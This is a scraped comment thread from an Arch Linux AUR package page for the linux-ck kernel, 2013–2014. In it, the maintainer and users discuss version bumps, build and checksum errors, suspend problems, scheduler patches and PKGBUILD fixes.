PKGBUILD. See the first set of comments to enable it. As always, post your experiences both good and bad to CK's blog so he can make ck1 and BFS more and more powerful and robust for everyone to enjoy. Note-I am not going to bump the pkgver to 2 since I just rebuild the repo overnight and since this is really no chance unless you enable it. graysky commented on 2014-08-01 02:36 Bump to v3.15.8-1 Changelog: Commit: graysky commented on 2014-07-30 19:22 Yeah, I saw them and in the past CK has considered the patch experimental and as noted in his blog post, "this patch by itself does nothing unless other code uses the locks." I don't want to add an experimental patch to the package must less to repo packages people depend on for stable systems. clfarron4 commented on 2014-07-30 19:10 I assume the flagger saw a new post on the CK blog and flagged out-of-date without reading. That said, the new post on the CK blog refers to these patches: Just after I build 3.15.7-1-ck-pax as well (with no time left today or tomorrow to muse over these new patches). I'm not the one flagging it out of date, but it's probably because ck released BFS 449. graysky stated earlier that he was busy with family stuff this weekend, so he just hasn't had a chance to do 3.15.3-2 yet. Bump to v3.14.10-1 Changelog: Commit: Note - CK should be releasing 3.15-ck1 shortly. We are having family come out to visit for the 4th of July holiday which may prevent me from updating all the linux-ck packages (nvidia, broadcom, vbox, etc.) to the 3.15 release until after they leave.: Sorry this could actually be something on my end. Tried downloading the file another few times and was still getting the mismatched hash. Looked at it a bit further and it turns out that the file was in plain text (not gz) - somewhere along the line it was being uncompressed automatically. Have a feeling it may be something to do with my ISP as I teathered up my mobile issues the same curl -O ... command, and got the correct response. clfarron4 commented on 2014-06-18 12:12 The sha256sum in the PKGBUILD is correct. clfarron4 commented on 2014-06-18 12:06 illis commented on 2014-06-17 23:03 sha256 match seems to be failing for the gcc patch. sha256sum enable_additional_cpu_optimizations_for_gcc_v4.9+.patch.gz 4883a4d45fdcb02600af976be8b9b89f459775ac8916712dfdefd29419c3eacf enable_additional_cpu_optimizations_for_gcc_v4.9+.patch.gz patching file include/uapi/linux/sched.h patching file include/linux/sched/rt.h patching file kernel/stop_machine/ia64/kvm/kvm-ia64.c patching file arch/powerpc/kvm/book3s_hv.c Hunk #1 succeeded at 1509 (offset -2 lines). patching file arch/x86/Kconfig patching file arch/x86/kvm/x86.c Hunk #1 succeeded at 6114 (offset -1 lines). patching file kernel/Kconfig.preempt patching file kernel/Kconfig.hz patching file Makefile ==> ERROR: A failure occurred in prepare(). Aborting... Generally speaking, sure this is an issue with the Makefile being patched, has anyone else had this issue? If its just me, I dont mind trying to patch the patch, and provide back. graysky commented on 2014-06-16 22:03 Bump to v3.14.8-1 Changelog: Commit: clfarron4 commented on 2014-06-16 21:56 mariojuniorjp commented on 2014-06-14 11:45 Seriously, I just wanted to know why it is not working out the compilation of the kernel. Done again, and it was until the end. Once finished installing the kernel, simply aur started again with the same procedure. Canceled, ran the grub, it detected the new kernel, I sent restart and when I went to look, simply appears only the default system kernel. I've compiled again (manual mode), and it worked. I would just download the files, and compile without using the damn yaourt? @graysky @Scimmia I'm building using Yaourt. :P I did not know it would cause an error in compiling the kernel that way. I've only set up the PKGBUILD, other things too, and then sent compile the kernel. @Schemeidenbacher #-- Specify a directory for package building. #BUILDDIR=/tmp/makepkg Is this? I'm getting an error on the part of the kernel build, and do not know how to solve. The error is this one: patch: **** write error : No space left on device ==> ERROR: A failure occurred in prepare(). Aborting... ==> ERROR: Makepkg was unable to build linux-ck. ==> Restart building linux-ck ? [y/N] Have plenty of space on the partition, then do not know what the logic of this error. Oo graysky commented on 2014-06-11 20:40 Bump to v3.14.7-1 Changelog: Commit: graysky commented on 2014-06-11 20:40 I think it's because repo-ck moves lots of data and they [godaddy] want me to get sick of them and drop my unlimited service they have me in at an old rate. They have offered to upgrade me to a dedicated server for higher reliability several times now for a large increase in my monthly fee. Each time I remind them that my plan is unlimited and that they can upgrade me without a charge. Bastards. I am working slowly with barrikad to setup a mirror on his service. I have been very busy with work/family shit and traveling though. I am booked this weekend as well but hope to do some testing and setup with him shortly. Since some days I get this kind of error while retrieveing packages from repo-ck: error: failed retrieving file 'linux-ck-core2-3.14.6-2-x86_64.pkg.tar.xz' from repo-ck.com : transfer closed with 55761293 bytes remaining to read Am I the only one? OK. I see that 3.14.6-1 is now in svn. I have further adjusted the gcc patch and am building 3.14.6-2 now. I will upload the source tarball to the AUR in several hours once I see that the various new arches using the patch build just fine. For those wanting a tarball early, find it here[1] and please be sure to post to the AUR your experiences building (good or bad) and for which arch! 1. graysky commented on 2014-06-08 00:10 OK... I am building with the new patch but will not index the repo until I get some feedback that everything is ok from you guys. So: 1) If you want to build 3.14.6-1-ck yourself, download the source tarball here.1 2) If you want to try a repo-ck package, just browse manually to and navigate to either x86_64 or i686 and manually download the package for your processor. Remember that I am building now and will not have a complete set for another 6 hours or so. 1. graysky commented on 2014-06-07 23:25 Ivy works for me... no access to older stuff that I can mess with at this point in time. graysky commented on 2014-06-07 23:06 I need some savvy users of newer intel cpus (any core ix like nehalem, sandy, ivy, or haswell) to try out the new patch I have placed in my 'unstable' branch. Just substitute the line in this PKGBUILD for it. Please build the package selecting the nconfig option for your hardware, boot into it and let me know that my stuff works. graysky commented on 2014-06-07 21:27 I know that 3.14.6 was just released but I want to wait to make the linux-ck release to see what tpowa does with the official ARCH package as it seems a few new config options are introduced. Please do not flag linux-ck out-of-date until the ARCH 3.14.6-1 is pushed to svn or repo. Thanks! graysky commented on 2014-06-07 19:37 I see now that this is confirmed: I will need to adjust the patch accordingly. graysky commented on 2014-06-07 19:29 Interesting that with the new version of gcc, these "older" options for march and mtune seem to have been made more generic. For example, on my ivy: % gcc -c -Q -march=native --help=target | grep march -march= ivybridge Older gcc version returned -march= core-avx-i @dlh, sure linux-ck-haswell is not compiled with that options and I think that is another story if you are compiling from source, right? Did I understand wrong? If GCC is wrong with some options when you issue -native, you may have missed some other options too, other than -mno-avx -mno-avx2.: I have G3220 and with native I have -mno-avx -mno-avx2 But you are re saying that linux-ck-haswell is compiled with those options, right? That is why I am unable to run it, correct me if I am wrong? I have an Celeron G1840 CPU. It's an "Haswell" CPU but the Linux-ck-haswell Package doesn't work with CPU. It stops working while loading the initial ramdisk. If i switch to linux-ck-ivybridge, everything works fine. Let me take them in order: clfarron4 - Yes, that patch is needed for building with SMP but this is the first time I can remember it coming up. In the interest of simplicity when I merge this PKGBUILD with the official ARCH PKGBUILD on major version bumps, I want to minimize the potential for errors on my part and thus am rejecting the request to add the SMP patch. CK may roll it into his patchset which is fine, but there aren't many people building this package on a single core system. @janck - I see, you're saying that the modification is needed to keep the build from FAILING in the case of you stripping out the extraneous config options. OK. I will implement your fix and for my sanity comment the PKGBUILD as such so I don't nuke it on an major version merge. @koshak - The sums match for me, not sure why your sums are different. I also don't understand your comment about the gz being txt. Are you editing with something smart like vim? For example, vim will decompress the gz when you open the gz transparently. I hope that addresses everyone's concerns. docwild commented on 2014-05-29 13:20 as clfarron4 mentioned below I suggested a CONFIG_SMP patch on the forum repo topic by mistake. That post is now gone but I'll put it here: Adding [code] if grep --quiet "# CONFIG_SMP is not set" "${startdir}/config.last" 2&>0 /dev/null || grep --quiet "# CONFIG_SMP is not set" "${startdir}/config.x86_64.last" 2&>0 /dev/null then msg "Patch NOSMP patch" patch -Np1 -i "${srcdir}/ck-nosmp.patch" fi [/code] at the very end of the prepare() function, after populating the config.old file allows users with uniprocessors to disable symmetric multiprocessing support in kernel config (it has some overhead). The "ck-nosmp.patch" file here: Mentioned on cks blog here: After removing all dvb shit from kernel config, include/config/dvb does not exist in the source tree anymore, and consequently the build fails at line 432. This fixes my particular problem (have been testing that it works this time): if [ -d include/config/dvb/ ]; then mkdir -p "${pkgdir}/usr/lib/modules/${_kernver}/build/include/config/dvb/" cp include/config/dvb/*.h "${pkgdir}/usr/lib/modules/${_kernver}/build/include/config/dvb/" fi - But again, the PKGBUILD as-is should accomplish this: mkdir -p "${pkgdir}/usr/lib/modules/${_kernver}/build/include/config/dvb/" cp include/config/dvb/*.h "${pkgdir}/usr/lib/modules/${_kernver}/build/include/config/dvb/" janck commented on 2014-05-28 22:13 Found a fix from a previous build. # this line will allow the package to build if a user disables the dvb shit find include/config/dvb -name '*.h' -exec cp {} "${pkgdir}/usr/src/linux-${_kernver}/include/config/dvb/" \; graysky commented on 2014-05-28 18:55 @janck - Guess I'm confused... your statement says if include/config/dvb exists copy include/config/dvb/*.h to "${pkgdir}/usr/lib/modules/${_kernver}/build/include/config/dvb/" The current PKGBUILD just does that, first making the destination on line 432 and doing the same copy on line 433. What am I missing? Shit... did I merge out that line again? I need to review some past PKGBUILDs. I have a nasty habit of comparing linux-ck to linux the ARCH package to make sure I capture all the new changes. I think I may have merged out our change. I will look into it; faster if you can and point me to it given how busy I am these days. Since i've updatet to 3.14.3-1 i have the same issue, like it's discribed in: Is it possible to compile nls_iso8859-1 into the Kernel like it's been since 3.13? I don't know how to fix this issue without an Kernel with nls_iso8859- builtin support. This section of the package build's comments needs to be updated: "To keep track of which modules are needed for your specific system/hardware, # give module_db script a try: # This PKGBUILD will call it directly to probe all the modules you have logged!" needs to be changed to To keep track of which modules are needed for your specific system/hardware, # give modprobed_db script a try: # This PKGBUILD will call it directly to probe all the modules you have logged! graysky commented on 2014-04-12 22:19. chosig commented on 2014-04-12 19:24 redirects to -- which seems to have wrecked havoc with the subdomains, I guess the move isn't completed yet. Anonymous comment @coderkun, @dlh - In here, 3.13.9-1 from the repo works fine with KVM. I'm using the following: qemu-system-x86_64 -machine type=pc,accel=kvm -cpu host -m 1G -net nic,model=virtio -net user -vga qxl -drive file=*******/XP.qcow2,if=virtio -rtc base=localtime -balloon virtio -spice port=5900,disable-ticketing,image-compression=off,jpeg-wan-compression=never,playback-compression=off -device virtio-serial-pci -device virtserialport,chardev=spicechannel0,name=com.redhat.spice.0 -chardev spicevmc,id=spicechannel0,name=vdagent & coderkun and dlh - adam777 requested that patch in the bbs and replied that all is well with kvm.[1] I asked him to comment here. If the patch is causing breakage for users, I will disable it. I just need to know since I do not use KVM. 1. I'm experiencing random hangs of touchpad, mouse and keyboards at boot after kdm start. I'm unable to do anything but a hard reboot. This is what I find in the boot log: mar 24 09:58:53 elric kernel: BUG: unable to handle kernel NULL pointer dereference at (null) mar 24 09:58:53 elric kernel: IP: [<ffffffffa0c9b317>] mousedev_open_device+0x77/0x100 [mousedev] mar 24 09:58:53 elric kernel: PGD b646b067 PUD b6476067 PMD 0 mar 24 09:58:53 elric kernel: Oops: 0000 [#1] PREEMPT SMP mar 24 09:58:53 elric kernel: Modules linked in: mousedev(+) psmouse serio_raw atkbd libps2 uvcvideo videobuf2_vmalloc videobuf2_memops videobuf2_core videodev media coretemp arc4 microcode(+) iwldvm mac80211 pcspkr i2c_i801 lpc_ich snd_hda_codec_hdmi r592 memstick iwlwi mar 24 09:58:53 elric kernel: CPU: 0 PID: 367 Comm: acpid Tainted: P O 3.13.6-1-ck #1 mar 24 09:58:53 elric kernel: Hardware name: Sony Corporation VGN-SR21M_S/VAIO, BIOS R1110Y1 08/14/2008 mar 24 09:58:53 elric kernel: task: ffff8800b77dda30 ti: ffff8800b64c0000 task.ti: ffff8800b64c0000 mar 24 09:58:53 elric kernel: RIP: 0010:[<ffffffffa0c9b317>] [<ffffffffa0c9b317>] mousedev_open_device+0x77/0x100 [mousedev] mar 24 09:58:53 elric kernel: RSP: 0018:ffff8800b64c1c10 EFLAGS: 00010202 mar 24 09:58:53 elric kernel: RAX: 0000000000000000 RBX: ffff8800b655a000 RCX: ffff8800b655a068 mar 24 09:58:53 elric kernel: RDX: 0000000000000000 RSI: 0000000000000000 RDI: 0000000000000246 mar 24 09:58:53 elric kernel: RBP: ffff8800b64c1c28 R08: 0000000000000000 R09: ffff88013b001600 mar 24 09:58:53 elric kernel: R10: 0000000000000000 R11: 0000000000000004 R12: 0000000000000000 mar 24 09:58:53 elric kernel: R13: ffff8800b655a080 R14: ffff8800b65761a8 R15: ffff8801395cf300 mar 24 09:58:53 elric kernel: FS: 00007fae54adb700(0000) GS:ffff88013fc00000(0000) knlGS:0000000000000000 mar 24 09:58:53 elric kernel: CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 mar 24 09:58:53 elric kernel: CR2: 0000000000000000 CR3: 00000000b7726000 CR4: 00000000000007f0 mar 24 09:58:53 elric kernel: Stack: mar 24 09:58:53 elric kernel: ffff880138dda000 ffff8800b655a000 ffff8800b655a078 ffff8800b64c1c60 mar 24 09:58:53 elric kernel: ffffffffa0c9c0cc ffff8800b655a340 ffff8800b65761a8 ffff8801395cf300 mar 24 09:58:53 elric kernel: ffffffffa0c9ce80 ffff8801395cf310 ffff8800b64c1c98 ffffffff8118555f mar 24 09:58:53 elric kernel: Call Trace: mar 24 09:58:53 elric kernel: [<ffffffffa0c9c0cc>] mousedev_open+0xcc/0x150 [mousedev] mar 24 09:58:53 elric kernel: [<ffffffff8118555f>] chrdev_open+0x9f/0x1d0 mar 24 09:58:53 elric kernel: [<ffffffff8117ec97>] do_dentry_open+0x1b7/0x2c0 mar 24 09:58:53 elric kernel: [<ffffffff8118bf41>] ? __inode_permission+0x41/0xb0 mar 24 09:58:53 elric kernel: [<ffffffff811854c0>] ? cdev_put+0x30/0x30 mar 24 09:58:53 elric kernel: [<ffffffff8117f0b1>] finish_open+0x31/0x40 mar 24 09:58:53 elric kernel: [<ffffffff8118ed72>] do_last+0x572/0xe90 mar 24 09:58:53 elric kernel: [<ffffffff8118c236>] ? link_path_walk+0x236/0x8d0 mar 24 09:58:53 elric kernel: [<ffffffff8118f74b>] path_openat+0xbb/0x6b0 mar 24 09:58:53 elric kernel: [<ffffffff81190e5a>] do_filp_open+0x3a/0x90 mar 24 09:58:53 elric kernel: [<ffffffff8119d527>] ? __alloc_fd+0xa7/0x130 mar 24 09:58:53 elric kernel: [<ffffffff81180284>] do_sys_open+0x124/0x220 mar 24 09:58:53 elric kernel: [<ffffffff8118039e>] SyS_open+0x1e/0x20 mar 24 09:58:53 elric kernel: [<ffffffff814fd16d>] system_call_fastpath+0x1a/0x1f mar 24 09:58:53 elric kernel: Code: f0 8b 85 e0 5b 44 89 e0 41 5c 41 5d 5d c3 66 0f 1f 44 00 00 4c 89 ef 41 bc ed ff ff ff e8 d2 8b 85 e0 eb e0 48 8b 15 c9 21 00 00 <8b> 02 8d 48 01 85 c0 89 0a 75 c6 48 8b 05 37 1f 00 00 48 8d 98 mar 24 09:58:53 elric kernel: RIP [<ffffffffa0c9b317>] mousedev_open_device+0x77/0x100 [mousedev] mar 24 09:58:53 elric kernel: RSP <ffff8800b64c1c10> mar 24 09:58:53 elric kernel: CR2: 0000000000000000 mar 24 09:58:53 elric kernel: ---[ end trace fffdd7fde71f92ba ]--- I'm not really sure the culprit is the kernel, but I don't have time now to test with a stock kernel. So I'd like to know if any other user of linux-ck experiences this (I'm using linux-ck-core2) graysky commented on 2014-03-22 13:31 Bump to v3.13.6-2 Changelog: Fix mass storage problems. Commit: Since 3.13.7 is due out within the next 24 h.[1] According to the 3.13.7-rc1 patchset, both of these patches are included therein. I will bump 3.13.6 to -2 and include them both, but I don't want to rebuild all the repo packages since I will likely be doing it again when upstteam releases shortly. 1. graysky commented on 2014-03-22 12:57 Bump to v3.13.6-2 Changelog: Fix mass storage problems. Commit: graysky commented on 2014-03-22 12:55 @sir_lucjan - 3.13.7 is due out within the next 24 h.[1] According to the 3.16.7-rc1 patchset, both of these patches are included therein. I will bump 3.13.6 to -2 and include them both, but I don't want to rebuild all the repo packages since I will likely be doing so again tomorrow morning when 3.13.7 goes gold. 1. sir_lucjan commented on 2014-03-22 11:08 I tried the default kernel config instead of my tailored one and it worked with the current ck kernel and systemd. I still don't know where the problem is (I did not modify the config in months), but I've come to the conclusion that it must be my (or better my config's) fault. Schmeidenbacher commented on 2014-03-06 09:31 Now that you mention it, i run my system from an encrypted lvm configuration. My mkinitcpio.conf has the following MODULES and HOOKS configurations: MODULES="dm_mod ext2 ext4" HOOKS="base udev v86d autodetect modconf block keyboard keymap lvm2 encrypt filesystems shutdown fsck" Note, that my system is not configured in english, so i had to add keymap and keyboard early on to get my encryption password entered correctly. xcomcmdr commented on 2014-03-06 06:31 I've tried every way to build linux-ck (without any modification but the ck, with the stock configuration, only with probed modules, ...). Still the same problem : Kernel panic - not syncing : VFS: Unable to mount root fs on unknown-block(0,0) Google suggests to include the ext4 module in the initrd image... Interesting. Since last night, while using the stock kernel and copying 35 GB of MP3s from /dev/sda2 (ext4) to /dev/sda1 (ntfs3g) firefox and audacious hanged a few times, which means that simple multitasking doesn't work (!), I wanted to try linux-ck's BFQ I/O scheduler once again... Schmeidenbacher commented on 2014-03-05 22:26 Mine works fine. The only issue i encountered with systemd 210-2 was the sudden urge of my quad-core desktop computer to start systemd-backlight@eeepc-wmi.service for some insane reason – scaring me with a nice red "FAILED" during boot – and systemd-logind.service to complain that it can't apply ACLs. Neither managed to hinder boot otherwise. My kernel is custom build using mostly the modules and drivers i need on my system. The kernel config can be found here: xcomcmdr commented on 2014-03-05 22:10 same issue here, since ages ago. Linux-ck can't mount / and panics. corro commented on 2014-03-04 22:52 It looks like I've encountered some troubles during boot with the 3.13.5 kernel and systemd 210-2. It only happens with the ck kernel, neither default ARCH nor AUR mainline kernel seem to be affected. The boot process always times out when mounting the local file systems and drops to the rescue shell. After a downgrade to systemd 208-11, the current ck kernel works fine again. You can find the boot log here:. Am I overlooking something or is there anyone experiencing the same problem? graysky commented on 2014-03-04 20:39 Updated nvidia-ck and fixed the postinstall scriptlet in virtualbox-ck-foo-modules. Thanks for reporting. kyak commented on 2014-03-04 14:12 hi graysky, it seems that virtualbox-ck-host-modules-ivybridge contains something after EOF in post_upgrade script... (18/21) обновление virtualbox-ck-host-modules-ivybridge [#####################################] 100% /tmp/alpm_gxCJK2/.INSTALL: line 23: warning: here-document at line 7 delimited by end-of-file (wanted `EOF') /tmp/alpm_gxCJK2/.INSTALL: line 24: ошибка синтаксиса: неожиданный конец файла /usr/bin/bash: post_upgrade: команда не найдена:30 @shillshocked, Fixed, thanks. modprobed-db still works if you call it via modprobed_db due to a symlink I put in its Makefile: # symlink for compatibility due to name change ln -s $(PN) "$(DESTDIR)$(BINDIR)/modprobed_db" You may have to turn off power management with the latest kernel under some configurations. I did (not using this kernel, but a plain vanilla one) under 3.13.5-1-ARCH. In my case all I had to do was add radeon.runpm=0 to the kernel boot options. No problem. I really wish the 'flag out-of-date' button required a reason to be entered like the one on the official packages to help maintainers understand why. For example, this package could be dated for several reasons: *kernel code *ck1 code *BFQ code Can't download anything form algo.ing.unimo.it. First i was getting timeouts, then the ip adress changed several times in a few minutes (i did "follow" it with several nslookups), and after it stabilized i got a "network unreachable" error. Several "is it down" sites on the net also report it as down. I see the problem... a mistake on my part when I fixed a previous mistake regarding the tick rate a few versions ago. I have fixed it now but have not bumped the pkgver since this is the only change (ie no BFQ in manually built packages of 3.12.6-1-ck). Repo-ck users have the scheduler due to the build script being smarter than its author :p paulfurtado commented on 2014-01-05 14:39 Thanks for the responses, graysky and coderkun. $ uname -a Linux paul-desktop 3.12.6-1-ck #1 SMP PREEMPT Sat Jan 4 17:40:03 EST 2014 x86_64 GNU/Linux $ cat /sys/block/sda/queue/scheduler noop deadline [cfq] Odd, on my test boxes, the old versions worked just fine. In any case, PKGBUILDs have been updated and repo package are syncing now. Refresh in 10 min or so to pull down the new package, then: # rmmod nvidia # modprobe nvidia Then restart your X server and all should be well... or if you're lazy, just update and reboot. csmk commented on 2013-10-14 16:11 @graysky: after upgradig to 3.11.5-1 my nvidia module has become unusable. nvidia: disagrees about version of symbol module_layout modprobe: ERROR: could not insert 'nvidia': Exec format error I'm using nvidia-ck-k10 from repo-ck. Please, can you help me?. fishburn graysky commented on 2013-10-01 20:04 This might have something to do with alx driver which recently has went upstream.. After applying the rmmod/modprobe fix as described here: (i actually used alx.sh fix from), hibernation seems to work. "Seems" because i only tried couple of times, let's see if it fails during the net few days. Anonymous comment. Anonymous comment on 2013-09-17 00:22 @kyak hibernate to RAM is buggy for -ck AUR since 3.10, I have not using -ck for some critical text editing. However if someone could tell me how to record the bug ? The system freeze when hibernate and only a hard reset can do. My box is X230, i7 with HD3000 GPU. kyak commented on 2013-09-16 19:37 hi graysky, thanks for pushing this change (it doesn't make any bad anyway). Unfortunately, it doesn't fix the problem for me. First time, it hibernates fine; the second time my laptop freezes hard -( Won't try any more so as not to rape my laptop ---- Bump to v3.11.1-2 Changelog: Added an option in the PKGBUILD to set the default tick rate from 300 to 1000 per reports (2 people now) on CK's blog that this fixes the suspend/resume issues people have been reporting.[1] Also cleaned-up the comments in the PKGBUILD. Commit: 1. @dlh - I am building packages now for the repo that will have 1k ticks enabled just like the default PKGBUILD recommends. If indeed this solves the suspend issues people are having, I think upstream needs to do this in the ck1 patchset itself... either that or figure out why some machines hang when suspending/waking up with the patchset. graysky commented on 2013-09-16 09:13 @dlh - I am building packages now for the repo that will have 1k ticks enabled just like the default PKGBUILD recommends. If indeed this solves the suspend issues people are having, I think upstream needed to do this in the ck1 patchset itself... either that or figure out why some machines hang when suspending/waking up with the patchset. BFQ is ready for 3.11 series. For those of you [misc] who like to see or build/run the pre-release of the next linux-ck as we wait for CK to patch into the new tree, I am hosting the incomplete (no ck1) stuff here: Note that all the PKGBUILDs/files for the xxx-ck stuff are in the tar file: % tar tf ck-next-1.0.tar.xz| grep PKGBUILD ./lirc-ck/PKGBUILD ./virtualbox-ck-modules/PKGBUILD ./broadcom-wl-ck/PKGBUILD ./nvidia-ck/PKGBUILD ./nvidia-304xx-ck/PKGBUILD ./linux-ck/PKGBUILD You can help by keeping an eye out for the ck1 patchset. It usually takes CK 1-2 weeks to get a patchset together for a major version bump. 3.11-1-ARCH has been published, so configs and patches, etc. aren't an issue. The only other must have is a BFQ patchset for the 3.11 tree. Paolo et al usually do a pretty good job timewise. Another wildcard is are the speed at which devs patch needed modules to build with 3.11. Nvidia and virtualbox for example. runnytu commented on 2013-09-03 09:41 @graysky I flagged the package before read your post, sorry for the inconvenients, i don't know what are the differents procedures when a major release of kernel are taken, sorry for that, i wait until upstream code and all patches for ck and bfs are released. graysky commented on 2013-09-03 09:00 @runnytu -did you read my last post??? Why are you flagging this package when upstream code doesn't yet exist? graysky commented on 2013-09-02 21:50 Guys - I realize that 3.11.0 was just mainlined, but we don't yet have several of the prereqs to make a proper linux-ck release[1]: *ck1 *bfq Please flag it again once we have them in case I miss it. 1. :( Anonymous comment on 2013-08-30 08:28 @graysky nop, my problem is not like [1]. It does not report any thing and the screen goes blank after I select the arch-ck boot entry. I am using UEFI boot mode with CSM disabled. My box is a lenovo x230 with intel HD4000 gpu cards. 3.10.9-1 can boot ok but I suffers from random freeze/lockup so I think upgrade to 3.10.10-1 might solve the problem. Anonymous comment on 2013-08-30 08:26 ] : Anonymous comment on 2013-08-30 08:25 ] : graysky commented on 2013-08-30 07:42 @liubenyuan - Is it the same problem described here[1]? Are you booting with BFQ enabled? What if you disable it? Paolo will need to know if his new patch does not fix the problem. 1. Anonymous comment on 2013-08-30 07:38 @graysky anyway, i failed to boot 3.10.10-1 and I am waiting for your magic update like 3.10.8 -> 3.10.9 :) And one problem I need report is that once I upgrade to 3.10.9, the system suffers with random lockup and a hard reset must be done. graysky commented on 2013-08-30 07:14 @liubenyuan - Not according to Paolo: On 08/28/2013 03:33 AM, Paolo Valente wrote: > I'm not sure I fully understood your question, anyway: > to add BFQ-v6r2 to a 3.10.8+ kernel from scratch, the patchset [1] is all you need > > I hope this addresses your issue, > Paolo > > Il giorno 27/ago/2013, alle ore 21:04, member graysky ha scritto: > >> > Hi Paolo. I see you posted some new BFQ code[1]. Tell me, are these considered "stable?" Also, I noticed that I can still patch the included one from that google group link on top of these 3 you posted. Doesn't that mean that your patches are different from the one there? Should I still patch your 3 plus the one by Arianna Avanzini[2]? >> > >> > 1. >> > 2. >> > Anonymous comment I will look into that BFQ patch when I are lease 3.10.9-1 later this afternoon, my understanding through reading anecdotal reports is that indeed, BFQ and 3.10.8 do not play well together. PS sorry about the multiple posts. Posting from a phone sucks, I've had hard lockups at boot-time with linux-ck and the vanilla kernel for a long time. It's rare and random, however. :/ 3.10-8-1-ck gives me the same error as BorgHunter. I reverted to 3.10-7-1-ck and it works fine. I do not have "elevator=something" in my kernel boot line. 3.10.8 definitely causes problems for me. Hard lockup at boot with the message "Fixing recursive fault but reboot is needed" or something like that (can't find any logs for it). Looks like, according to the changelog, 3.10.9 might solve this. I'm on the vanilla kernel (3.10.7) until ck is updated. I'm getting seg. fault when compiling linux-ck 3.10.7-2 all other 3.10 versions and I compiled each of them have worked properly and compiled properly. How and where to file bug report about this? This is paste of this compile error Anyone have any hints about what may cause a problem or maybe had similar issue ? @jonhoo - I don't believe this is a limitation of the linux-ck package but of how makepkg works. I am not an expert; I recommend that you open a thread asking how to compile a kernel as you want to do for someone with real knowledge about it to comment. dlh commented on 2013-08-13 12:23 Well in gentoo linux, first of all you downloading the whole source of proper series, for instance 3.10 and then set of patches. Then scripts for managing updates will unpack 3.10 and then apply all patches starting from 3.10.1 to one which is demand in this case 3.10.6 so 6 patches will be applied during this process. qpalz commented on 2013-08-13 12:18 @Jonhoo Kernel patches is not totally incremental. Patch for 3.10.6 is for 3.10.0 -> 3.10.6, but NOT for 3.10.5 -> 3.10.6. You cannot update the src from 3.10.5 to 3.10.6 by simply applying the patch of 3.10.6. Also, as far as I know, you should always recompile everything even if you have only changed some configuration. There is some bugs in the Makefile. (Not sure whether this is true now) Jonhoo commented on 2013-08-13 10:43 @graysky: As I wrote, removing src/ is what I'm currently doing, but this means make has to recompile every single file, which is a bit of a waste. The kernel patches are incremental, so applying them on top of an existing source tree should upgrade that source tree without needing to run make from scratch. I don't know why this isn't working with linux-ck though... Quite often when a new patch level is released and I run makepkg, I see: The next patch would create the file ..., which already exists! Assume -R? [n] This is rather annoying, as the only solution I've found thus far is to rm -r src/. Not entirely sure why this is happening? This time the file in question was "drivers/acpi/acpi_cmos_rtc.c", but I'm fairly certain other files have been the problem before. graysky commented on 2013-08-11 11:01 @Det - Ah, thanks. It technically is but the difference there is purely cosmetic[1] and will be included in 3.10.6-1 whenever Greg releases that. It seems too that tpowa has been tweaking the Arch configs and added a patch[2] which I have incorporated into linux-ck, again these will be included in 3.10.6-1. When you guys hit the flag button, I always have to review the various patchsets (ck, BFQ, upstream, etc.) to figure out why it's out-of-date :p 1. 2. @kyak - This can happen when the Arch devs push a major version update of nvidia-utils to the official servers and I am away from my work station or unable to update the nvidia-ck package to match. It is rare and the version conflict will prevent any breakage. I just updated nvidia-ck package to 325.15 and populated the repo with them as well. If you refresh and update you should be good now. In the future, simply flagging the nvidia-ck package out-of-date will alert me to the Arch update. This is true for nvidia-304xx-ck, lirc-ck, and virtualbox-ck-modules too. graysky commented on 2013-08-06 19:32 @kyak - This can happen when the Arch devs push a major version update of nvidia-utils to the official servers and I am away from my work station or unable to update the nvidia-ck package to match. It is rare and often only for a few hours. I just updated nvidia-ck package to 325.15 and populated the repo with them as well. If you refresh and update you should be good now. Same here, my laptop (Asus N76VZ) only hibernates maybe 25% of total attempts. The problem is not reproducible, so i can't really report it. The fact is, starting some time from 3.10 series and up to the latest 3.10.3 i can't rely on hibernation to work..: Anonymous comment on 2013-07-25 22:11 Reported. I am using linux-ck-3.10.1 and linux-ck-3.10.2 for two weeks, how ever the -ck patch set suffers from suspend issues for my thinkpad X230 box. About 25% chance when you pressed Fn + F4 (suspend-to-ram), the system locked (may be kernel panic) and the power/sleep led keep on flashing fast. you have to hold the power button to shutdown it. #1. commented out the line 110 of the PKGBUILD of linux-ck 3.10.2 does not resolve this problem. it still could not function suspend-to-ram properly #2. I switched to the linux-3.10.2 ARCH kernel yesterday, the suspend-to-ram functioned well so far, 11/11 success. I do not know whether it is a 3.10 mainline bug or related to the BFS/ck patchset. I installed 3.11-rc2 today and keep on reporting the results, if it is usefull. and how could I save the kernel log when the system hangs ? I found no evidence of such failure in journalctl or dmesg log. graysky commented on 2013-07-25 19:12 Guys - I have seen 1/2 dozen patches claiming to fix suspend issues. As stated before, I am not adding experimental patches to the PKGBUILD that are enabled. You guys should be savvy enough to just add a patch line to the PKGBUILD to include your favorite ones beyond what I am including. Please do so. I am happy to add a patch to the kernel once it has been accepted by upstream, particularly if it fixes a problem people are having. For the most part, I do not what to be the enabling force add commented lines to apply patches. Please post if you have applied the patch yourself and tested in a robust fashion. In other words, run it for a few days, if it fixes a particular issue, pound on your system trying to reproduce the bug a number of times etc. Above all else, please open a flyspray against the Arch kernel package if you know the issue is contained in mainline since we're all in the same boat, ck patchset or not. /off my soapbox jim1960 commented on 2013-07-25 13:01 I'm using linux-mainline v3.11rc2 and nvidia-beta v325.08, just work fine. It fixed suspend/resume issue with linux v3.10.x (linux-ARCH & linux-ck) the patch for linux-mainline v3.11rc2, follow the #4 of posts (kernel_v3.10.patch.txt): CPU: AMD Athlon(tm) II X4 651 Quad-Core Processor (651K) GPU: nVidia GTS 450 dlh commented on 2013-07-25 09:17 I can say that in 3.10 kernel suspend often work and so in 3.9.x, but sometimes I left with blinking cursor, but 3.10.x is completely broken. I roll back to 3.9.9 from official repo for now and I'm monitoring the current state. graysky commented on 2013-07-24 22:45 @indie - I just refreshed 3.10.2-1-ck without bumping the pkgver. What changed? I added the patch you recommended but left it comments out. There is therefore no difference between this version and the original unless the user uncomments line 110. Why? I am won't add an experimental patch to the PKGBUILD that is enabled by default. Please uncomment line 110 and test. Hopefully, if this patch indeed fixes this issue, it will be merged for inclusion in 3.10.3 proper. Also, if I works, I would encourage you to open a bug report against the official Arch kernel package linking the patch and describing your experiences with it. I didn't know where to post, I couldn't find bugzilla or something similar. So I decided to do it right here. I'm using precompiled kernel linux-ck-core2 from your repository and I no more able to suspend my machine. lip 18 10:12:48 HALF-BLOOD systemd[1]: Stopped A simple open wireless connection. lip 18 10:12:48 HALF-BLOOD systemd[1]: Started netctl sleep hook. lip 18 